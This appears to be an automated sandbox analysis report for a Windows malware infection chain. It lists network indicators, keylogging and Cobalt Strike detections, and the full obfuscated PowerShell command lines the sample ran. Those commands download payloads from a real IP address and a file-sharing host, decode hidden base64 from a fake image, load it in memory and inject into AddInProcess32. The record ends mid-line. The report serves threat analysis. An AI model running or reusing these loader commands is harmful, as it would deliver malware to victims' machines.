Source: Yara match	File source: 10.2.powershell.exe.95265d0.0.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /352/WRFFRF.txt HTTP/1.1Host: 192.3.22.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 142.215.209.78 142.215.209.78
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ip-api.com

Source: global traffic

HTTP traffic detected: GET /xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.22.13Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.22.13

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_031E4B90 URLDownloadToFileW,

1_2_031E4B90

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1Host: 1017.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.3.22.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /352/WRFFRF.txt HTTP/1.1Host: 192.3.22.13Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: 1017.filemail.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com

Source: powershell.exe, 00000001.00000002.2267939334.0000000005151000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/xampp/se/seet
Source: powershell.exe, 00000001.00000002.2277730748.0000000007718000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2277730748.0000000007692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF
Source: powershell.exe, 00000001.00000002.2277730748.0000000007718000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF.f
Source: powershell.exe, 00000001.00000002.2277730748.0000000007692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFM
Source: powershell.exe, 00000001.00000002.2277730748.0000000007718000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFdB
Source: powershell.exe, 00000001.00000002.2277730748.0000000007718000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFlaF
Source: powershell.exe, 00000008.00000002.2824080793.0000000003290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000003.00000002.2155724364.0000000007BAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000003.00000002.2152246100.000000000588A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002F59000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: powershell.exe, 0000000A.00000002.2478122048.0000000009526000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000001.00000002.2274759590.0000000005DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2153730468.00000000062F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2427492683.0000000005E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2427492683.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2152246100.00000000053E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.2267939334.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2152246100.0000000005291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2826245247.0000000004DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2427492683.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3345591144.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2152246100.00000000053E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000A.00000002.2427492683.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.2427492683.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com
Source: powershell.exe, 00000008.00000002.2826245247.000000000515E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filekLR
Source: powershell.exe, 0000000A.00000002.2424212797.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2427492683.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2426682841.00000000030E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2
Source: powershell.exe, 0000000A.00000002.2427492683.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2424212797.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
Source: powershell.exe, 0000000A.00000002.2478122048.0000000009526000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000C.00000002.3337236460.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: powershell.exe, 00000001.00000002.2267939334.0000000004D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2152246100.0000000005291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2826245247.0000000004E19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2826245247.0000000004E28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2427492683.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.2152246100.00000000053E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000A.00000002.2427492683.0000000005E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2427492683.0000000005E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2427492683.0000000005E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2427492683.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2267939334.00000000055A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2277730748.00000000076D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.comupdating
Source: powershell.exe, 00000001.00000002.2274759590.0000000005DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2153730468.00000000062F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2427492683.0000000005E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Source: unknown

HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.6:49725 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 10.2.powershell.exe.95265d0.0.raw.unpack, xljC6U.cs

.Net Code: YPw7g

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)\| .((Get-VARIabLE 'mdr').Name[3,11,2]-JoiN'')"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 